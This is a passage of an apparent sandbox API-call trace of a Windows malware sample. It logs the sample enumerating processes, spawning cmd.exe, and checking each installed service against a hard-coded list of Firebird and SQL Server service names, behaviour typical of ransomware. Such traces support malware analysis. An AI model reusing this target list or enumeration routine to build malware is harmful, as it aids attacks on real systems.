lstrlenW (lpString="wininit.exe") returned 11 [0185.983] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.983] lstrlenW (lpString="csrss.exe") returned 9 [0185.983] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.984] lstrlenW (lpString="winlogon.exe") returned 12 [0185.984] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.985] lstrlenW (lpString="services.exe") returned 12 [0185.985] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.986] lstrlenW (lpString="lsass.exe") returned 9 [0185.986] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0185.986] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0185.987] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0185.987] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0185.987] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.988] lstrlenW (lpString="svchost.exe") returned 11 [0185.988] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.989] lstrlenW (lpString="svchost.exe") returned 11 [0185.989] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.990] lstrlenW (lpString="dwm.exe") returned 7 [0185.990] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.990] lstrlenW (lpString="svchost.exe") returned 11 [0185.990] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.991] lstrlenW (lpString="svchost.exe") returned 11 [0185.991] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.992] lstrlenW (lpString="svchost.exe") returned 11 [0185.992] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.993] lstrlenW (lpString="svchost.exe") returned 11 [0185.993] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.994] lstrlenW (lpString="svchost.exe") returned 11 [0185.994] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.994] lstrlenW (lpString="svchost.exe") returned 11 [0185.994] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.995] lstrlenW (lpString="svchost.exe") returned 11 [0185.995] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.996] lstrlenW (lpString="svchost.exe") returned 11 [0185.996] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.997] lstrlenW (lpString="svchost.exe") returned 11 [0185.997] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.997] lstrlenW (lpString="svchost.exe") returned 11 [0185.998] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.998] lstrlenW (lpString="spoolsv.exe") returned 11 [0185.998] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.999] lstrlenW (lpString="svchost.exe") returned 11 [0185.999] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.000] lstrlenW (lpString="audiodg.exe") returned 11 [0186.000] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0186.001] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0186.001] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0186.001] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0186.002] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0186.002] lstrlenW (lpString="Memory Compression") returned 18 [0186.002] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0186.003] lstrlenW (lpString="sihost.exe") returned 10 [0186.003] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.004] lstrlenW (lpString="svchost.exe") returned 11 [0186.004] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0186.005] lstrlenW (lpString="msoia.exe") returned 9 [0186.005] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0186.005] lstrlenW (lpString="taskhostw.exe") returned 13 [0186.005] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.006] lstrlenW (lpString="explorer.exe") returned 12 [0186.006] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0186.007] lstrlenW (lpString="SearchUI.exe") returned 12 [0186.007] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0186.008] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0186.008] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0186.009] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0186.009] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.010] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0186.010] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0186.011] lstrlenW (lpString="hgaibc.exe") returned 10 [0186.011] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0186.011] lstrlenW (lpString="cmd.exe") returned 7 [0186.011] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.012] lstrlenW (lpString="conhost.exe") returned 11 [0186.012] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0186.013] lstrlenW (lpString="cmd.exe") returned 7 [0186.013] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.014] lstrlenW (lpString="conhost.exe") returned 11 [0186.014] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0186.015] CloseHandle (hObject=0x358) returned 1 [0186.015] Sleep (dwMilliseconds=0x1f4) [0186.535] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee58 [0186.569] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0186.569] GetLastError () returned 0xea [0186.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d7798 [0186.570] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d7798, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d7798, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0186.571] CloseServiceHandle (hSCObject=0x6bee58) returned 1 [0186.571] lstrlenW (lpString="Appinfo") returned 7 [0186.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0186.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0186.571] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0186.571] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0186.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0186.571] lstrlenW (lpString="AppXSvc") returned 7 [0186.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0186.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0186.571] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0186.571] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0186.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0186.571] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0186.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0186.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0186.572] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0186.572] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0186.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0186.572] lstrlenW (lpString="Audiosrv") returned 8 [0186.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0186.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0186.572] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0186.572] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0186.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0186.572] lstrlenW (lpString="BFE") returned 3 [0186.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0186.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0186.572] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0186.572] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0186.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0186.572] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0186.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0186.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0186.572] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0186.572] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0186.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0186.572] lstrlenW (lpString="CDPSvc") returned 6 [0186.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0186.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0186.572] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0186.572] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0186.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0186.572] lstrlenW (lpString="ClickToRunSvc") returned 13 [0186.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0186.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0186.573] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0186.573] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0186.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0186.573] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0186.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0186.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0186.573] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0186.573] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0186.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0186.573] lstrlenW (lpString="CryptSvc") returned 8 [0186.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0186.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0186.573] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0186.573] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0186.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0186.573] lstrlenW (lpString="DcomLaunch") returned 10 [0186.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0186.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0186.573] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0186.573] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0186.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0186.573] lstrlenW (lpString="DeviceAssociationService") returned 24 [0186.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0186.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0186.573] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0186.573] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0186.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0186.573] lstrlenW (lpString="Dhcp") returned 4 [0186.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0186.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0186.574] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0186.574] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0186.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0186.574] lstrlenW (lpString="Dnscache") returned 8 [0186.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0186.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0186.574] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0186.574] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0186.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0186.574] lstrlenW (lpString="DPS") returned 3 [0186.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0186.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0186.574] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0186.574] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0186.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0186.574] lstrlenW (lpString="DusmSvc") returned 7 [0186.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0186.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0186.574] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0186.574] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0186.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0186.574] lstrlenW (lpString="EventLog") returned 8 [0186.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0186.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0186.574] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0186.574] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0186.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0186.574] lstrlenW (lpString="EventSystem") returned 11 [0186.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0186.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0186.575] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0186.575] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0186.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0186.575] lstrlenW (lpString="FontCache") returned 9 [0186.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0186.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0186.575] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0186.575] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0186.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0186.575] lstrlenW (lpString="gpsvc") returned 5 [0186.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0186.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0186.575] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0186.575] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0186.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0186.575] lstrlenW (lpString="iphlpsvc") returned 8 [0186.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0186.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0186.575] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0186.575] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0186.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0186.575] lstrlenW (lpString="KeyIso") returned 6 [0186.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0186.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0186.575] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0186.575] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0186.575] lstrcmpiW 